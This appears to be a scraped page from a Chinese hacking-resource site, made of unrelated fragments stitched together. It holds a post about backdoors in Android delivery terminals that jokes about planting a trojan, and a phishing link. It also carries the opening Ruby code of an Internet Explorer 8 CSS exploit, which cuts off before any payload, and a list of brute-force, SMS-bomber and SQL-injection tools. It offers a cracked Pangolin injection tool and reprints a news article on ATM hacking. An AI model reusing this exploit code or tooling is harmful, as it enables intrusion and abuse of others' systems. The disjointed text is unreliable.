之前银行的各种atm机基本都是windows xp,现在各种终端设备基本都是安卓。当然,为了方便维护肯定会留一些特殊的设置或者后门来方便维护啊。之所以研究这个东西是因为,之前这个破设备老是断网,取不出快递来。于是想着怎么重新联网,于是折腾了半天发现可以连自己手机热点恢复网络,所以这个东西自然也可以干其他的事情啊,比如ip+1(再比如,装个木马~~)。
新式钓鱼【systemup.org】
mitmproxy
mitmproxy是一款支持SSL的HTTP代理,它可以用于调试HTTP通信,发起中间人攻击等。mitmproxy提供了一个控制台接口用于动态拦 截和编辑HTTP数据包。mitmdump是mitmproxy的命令行版本,功能与其相同。
link:http://www.mitmproxy.org/
mitmproxy的主要特点:
Intercept and modify HTTP traffic on the fly
Save HTTP conversations for later replay and analysis
Replay both HTTP clients and servers
Make scripted changes to HTTP traffic using Python
SSL interception certs generated on the fly
Internet Explorer 8 CSS Parser Exploit Code
#!/usr/bin/env ruby
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)
require 'socket'
def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
opts = defaults.merge(opts)
code = opts[:code]
message = opts[:message]
type = opts[:type]
to_send = "HTTP/1.1 #{code} #{message}\r\n" +
"Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" +
"Cache-Control: no-cache\r\n" +
"Content-Type: #{type}\r\n" +
"Pragma: no-cache\r\n" +
"Content-Length: #{data.length}\r\n\r\n" +
"#{data}"
puts "[+] Sending:"
to_send.split("\n").each do |line|
puts " #{line}"
end
sock.write(to_send) rescue return false
return true
end
def sock_read(sock, out_str, timeout=5)
begin
if Kernel.select([sock],[],[],timeout)
out_str.replace(sock.recv(1024))
puts "[+] Received:"
out_str.split("\n").each do |line|
puts " #{line}"
end
else
sock.close
return false
end
rescue Exception => ex
return false
end
end
def to_uni(str)
res = ""
str.each_byte do |b|
res < < "\x00#{b.chr}"
end
res
end
Reiluke tools(include SQlIhelper 2.7)
File List:
2009-02-12 09:33 <DIR> admin finder
2009-02-16 10:25 <DIR> blind Sqli
2009-02-12 10:03 <DIR> cpanel bruteforcer
2009-02-12 09:53 <DIR> duplicate remover
2009-02-12 09:52 <DIR> email brute
2009-02-16 10:25 <DIR> email checker
2009-02-12 10:01 <DIR> exploit scanner
2009-02-12 10:04 <DIR> php rapidshare checker
2009-02-12 09:57 <DIR> rapidshare checker
2009-02-12 09:36 <DIR> sms bomber
2009-02-12 09:54 <DIR> sqli column counter
2009-09-01 10:50 <DIR> sqliHelper 2.7
2009-02-12 10:02 <DIR> steam checker
Pangolin professinal edition 3.0.0.1016 Cracked
黑掉ATM的机会:编写恶意程序黑掉后台系统
《新知客》9月刊报道 要黑银行的ATM有两条路:编个恶意程序,直接骗过柜员机上那个漏洞百出的Windows系统;或者先黑银行的后台系统,盗取客户信息之后再大模大样到ATM取钱。这两条路,现在都有得走。
网络安全研究人员杰克(Barnaby Jack)在美国拉斯维加斯的黑帽安全会议(Black Hat)上原本有一个精彩的演讲,他准备演示如何入侵ATM(自动柜员机),以证明多种不同型号的ATM存在安全隐患。“我一直很喜欢《终结者2》的一个场景,约翰·康纳走到一台自动柜员机前,将Atari接入读卡器并从机器中取出大量现金。我认为已经找到了这样做的关键。”
杰克为自己的演讲取名为“自动柜员机让你发财”,但他最后并没有“美梦成真”,因为这次演讲最后被取消了。作为计算机网络公司瞻博(Juniper)的雇员,杰克被公司告知停止这次演讲,理由是ATM生产厂商对公司施压。
美国密歇根大学研究网络安全的哈德曼(J. Alex Halderman)教授在接受记者采访时对瞻博的这一行为表示理解,“ATM生产厂商可以以泄漏秘密为由将瞻博告上法庭,因为杰克善意的演讲可能会被人利用。在找到修补漏洞的办法之前,ATM不能冒这么大的风险。”美国黑客曾经入侵花旗银行的ATM网络,让花旗蒙受至少200万美元的损失,而这仅仅是ATM漏洞所致巨额损失中的九牛一毛。
ATM的“自动”机制
1967年6月27日,世界上第一台自动取款机在伦敦附近的巴克莱银行分行亮相。时至今日,据汇丰银行估计,95%的取款是通过ATM机而不是柜台出纳办理的。数亿人习惯了在墙上的“洞”里存钱、取钱。
“洞”的核心秘密在看不见的地方。
Pangolin V2.5.2.975 绿色多语版(SQL注入渗透测试工具)
详细介绍:
Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。